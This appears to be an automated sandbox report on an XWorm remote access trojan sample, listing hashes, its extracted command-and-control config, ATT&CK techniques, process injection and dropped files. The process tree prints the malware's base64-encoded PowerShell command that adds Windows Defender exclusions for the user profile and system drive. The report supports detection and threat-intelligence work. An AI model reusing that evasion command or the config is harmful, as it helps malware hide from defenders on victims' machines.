xworm | 2da50060f34dbe8ae3cb42988efbe40546eba522f090958013b3e47178aa04c7

General

Target

NHCUR_BootstrapperNew.exe
Size

2.9MB
MD5

8f4833925c458ee2c6b40ef0e0b978f0
SHA1

f37823826806dfe3ab30f6f92ee9807ca3265332
SHA256

2da50060f34dbe8ae3cb42988efbe40546eba522f090958013b3e47178aa04c7
SHA512

88b81b3d204b6ef0234740a0795659f6a924b5106a80cac8d4d174a48003285b395598952de6c03075f15b3cf1055d86d3e604b1346eb8285f098dc71f0e4e97
SSDEEP

49152:8gnJGTce2a1Qo0JjdjW62omu2pCoXghq86WKAlQAd882TQaa0t/s/LAZ42Q:tE4eBOo0JjdjpJcNA9882kJbMC

Score

10^/10

xworm defense_evasion discovery rat trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%port%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/GMv8QPCE

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000015d75-8.dat	family_xworm
behavioral1/memory/2596-14-0x0000000000870000-0x0000000000884000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Executes dropped EXE 3 IoCs

pid	Process
2400	BootstrapperNew.exe
2596	WMI Provider Host.exe
1192	Process not Found

Loads dropped DLL 2 IoCs

pid	Process
2728	NHCUR_BootstrapperNew.exe
2728	NHCUR_BootstrapperNew.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NHCUR_BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2292	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2596	WMI Provider Host.exe
Token: SeDebugPrivilege	2292	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2728 wrote to memory of 2292	2728	NHCUR_BootstrapperNew.exe	30
PID 2728 wrote to memory of 2292	2728	NHCUR_BootstrapperNew.exe	30
PID 2728 wrote to memory of 2292	2728	NHCUR_BootstrapperNew.exe	30
PID 2728 wrote to memory of 2292	2728	NHCUR_BootstrapperNew.exe	30
PID 2728 wrote to memory of 2400	2728	NHCUR_BootstrapperNew.exe	32
PID 2728 wrote to memory of 2400	2728	NHCUR_BootstrapperNew.exe	32
PID 2728 wrote to memory of 2400	2728	NHCUR_BootstrapperNew.exe	32
PID 2728 wrote to memory of 2400	2728	NHCUR_BootstrapperNew.exe	32
PID 2728 wrote to memory of 2596	2728	NHCUR_BootstrapperNew.exe	33
PID 2728 wrote to memory of 2596	2728	NHCUR_BootstrapperNew.exe	33
PID 2728 wrote to memory of 2596	2728	NHCUR_BootstrapperNew.exe	33
PID 2728 wrote to memory of 2596	2728	NHCUR_BootstrapperNew.exe	33

C:\Users\Admin\AppData\Local\Temp\NHCUR_BootstrapperNew.exe
"C:\Users\Admin\AppData\Local\Temp\NHCUR_BootstrapperNew.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAZgByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAdQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBzACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2292
- C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
  2⤵
  - Executes dropped EXE
  PID:2400
- C:\Users\Admin\AppData\Local\Temp\WMI Provider Host.exe
  "C:\Users\Admin\AppData\Local\Temp\WMI Provider Host.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe

Filesize
2.9MB

MD5
f227cdfd423b3cc03bb69c49babf4da3

SHA1
3db5a97d9b0f2545e7ba97026af6c28512200441

SHA256
cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

SHA512
b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

Download Submit
\Users\Admin\AppData\Local\Temp\WMI Provider Host.exe

Filesize
57KB

MD5
7f4631cc67828fc55d6c8bd1af02bf44

SHA1
54d6e1c3e0b655d231d461e32d187c0f2338295d

SHA256
5361c6e459fd49ee6a11f586c5dd3a2626f1338cdc4ce661287f48966451a6dd

SHA512
f931f8bde5aa6c2d528031fd5505eb6a0044edddcd1c5798ef762102e8d59e5701087259258d5cc15fea59e1e199f2c870fa95ad748a8e20680096cc4d62c348

Download Submit
memory/2400-21-0x0000000000DF0000-0x0000000000DFA000-memory.dmp

Filesize
40KB

Download
memory/2400-22-0x0000000000E00000-0x0000000000E26000-memory.dmp

Filesize
152KB

Download
memory/2400-17-0x00000000007E0000-0x00000000007EA000-memory.dmp

Filesize
40KB

Download
memory/2400-16-0x00000000007E0000-0x00000000007EA000-memory.dmp

Filesize
40KB

Download
memory/2400-18-0x00000000007E0000-0x00000000007F0000-memory.dmp

Filesize
64KB

Download
memory/2400-20-0x000000001E280000-0x000000001E380000-memory.dmp

Filesize
1024KB

Download
memory/2400-29-0x00000000007E0000-0x00000000007EA000-memory.dmp

Filesize
40KB

Download
memory/2400-15-0x0000000001030000-0x0000000001312000-memory.dmp

Filesize
2.9MB

Download
memory/2400-23-0x0000000000E40000-0x0000000000E48000-memory.dmp

Filesize
32KB

Download
memory/2400-24-0x0000000000EE0000-0x0000000000EF6000-memory.dmp

Filesize
88KB

Download
memory/2400-25-0x0000000000E30000-0x0000000000E3A000-memory.dmp

Filesize
40KB

Download
memory/2400-26-0x0000000000970000-0x000000000097A000-memory.dmp

Filesize
40KB

Download
memory/2400-27-0x0000000000E50000-0x0000000000E58000-memory.dmp

Filesize
32KB

Download
memory/2596-14-0x0000000000870000-0x0000000000884000-memory.dmp

Filesize
80KB

Download

Analysis

Sharing